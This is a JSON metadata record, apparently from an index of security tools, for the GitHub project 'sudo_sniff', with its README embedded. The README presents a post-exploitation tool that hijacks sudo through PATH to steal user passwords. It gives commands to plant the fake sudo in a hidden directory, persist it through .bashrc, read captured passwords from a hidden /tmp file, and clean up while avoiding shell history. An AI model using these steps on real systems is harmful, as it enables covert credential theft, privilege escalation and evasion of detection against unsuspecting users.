{"id":26458485,"url":"https://github.com/mjdubell/sudo_sniff","last_synced_at":"2025-03-19T00:01:53.044Z","repository":{"id":59168730,"uuid":"65943835","full_name":"dubs3c/sudo_sniff","owner":"dubs3c","description":"Steal user's password when running sudo for post-exploitation purposes","archived":false,"fork":false,"pushed_at":"2020-09-29T07:58:25.000Z","size":7,"stargazers_count":38,"open_issues_count":4,"forks_count":12,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-08-04T09:05:44.792Z","etag":null,"topics":["c","password-sniffer","post-exploitation"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dubs3c.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-08-17T21:39:04.000Z","updated_at":"2024-07-06T16:16:16.000Z","dependencies_parsed_at":"2022-09-12T22:50:10.916Z","dependency_job_id":null,"html_url":"https://github.com/dubs3c/sudo_sniff","commit_stats":null,"previous_names":["mjdubell/sudo_sniff"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dubs3c%2Fsudo_sniff","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dubs3c%2Fsudo_sniff/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dubs3c%2Fsudo_sniff/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dubs3c%2Fsudo_sniff/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/dubs3c","download_url":"https://codeload.github.com/dubs3c/sudo_sniff/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244326199,"owners_count":20435122,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["c","password-sniffer","post-exploitation"],"created_at":"2025-03-19T00:01:50.289Z","updated_at":"2025-03-19T00:01:53.033Z","avatar_url":"https://github.com/dubs3c.png","language":"C","funding_links":[],"categories":["\u003ca id=\"7bf0f5839fb2827fdc1b93ae6ac7f53d\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"32739127f0c38d61b14448c66a797098\"\u003e\u003c/a\u003e嗅探\u0026\u0026Sniff"],"readme":"# sudo_sniff\n**sudo\\_sniff** is a simple program that attempts to steal the user's password while running sudo without arousing any suspicion. The idea is to modify the user's `$PATH` in order to hijack sudo when executed by the user. This could be used in post-exploitation as an alternative route for acheiving root acces (given that the user has the correct permissions).\n\n**sudo_sniff** will store both correct and incorrect password entries at the following location per default: `/tmp/.temp5678`\n\n## Improvements\n* ~~Hide the victim's input~~\n* ~~Add function to either send the password to attacker or save it on disk.~~\n* sudo may be in different locations on different systems, perhaps implement a function to locate it\n* ~~[BUG] When the victim enters his input, the text asking for the password will be printed multiple times.~~\n\n## Usage\n```\nhunter@nsa:~$ git clone git@github.com:mjdubell/sudo_sniff.git\nhunter@nsa:~$ cd sudo_sniff/\nhunter@nsa:~$ make\nhunter@nsa:~$ ./sudo whoami\n```\n\n#### Post Exploitation\n```\nvictim@server:~$ mkdir $HOME/.payload\nvictim@server:~$ gcc -Wall -g -o $HOME/.payload/sudo sudo_sniff.c\nvictim@server:~$ echo 'export PATH=\"$HOME/.payload:$PATH\"' \u003e\u003e $HOME/.bashrc\n```\n*Note: Make sure `sudo` is executable.*\n\n##### Cleanup\n```\nvictim@server:~$ rm -rf $HOME/.payload; rm /tmp/.temp5678; sed '/export PATH=\"$HOME\\/\\.payload:$PATH\"/d' .bashrc \u003e tmp \u0026\u0026 mv tmp .bashrc\n```\n*Note: If the HISTCONTROL environment variable is set to \"ignorespace\" or \"ignoreboth\", adding a space before the command will prevent it from showing up when running `history`.*\n\n##### Retrieve the password\n```\nvictim@server:~$ cat /tmp/.temp5678\nvictim:mypasword:ERROR\nvictim:mypassword:SUCCESS\n```\n\n## Contributing\n1. Fork it!\n2. Create your feature branch: `git checkout -b my-new-feature`\n3. Commit your changes: `git commit -am 'Add some feature'`\n4. Push to the branch: `git push origin my-new-feature`\n5. Submit a pull request :D\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmjdubell%2Fsudo_sniff","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmjdubell%2Fsudo_sniff","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmjdubell%2Fsudo_sniff/lists"}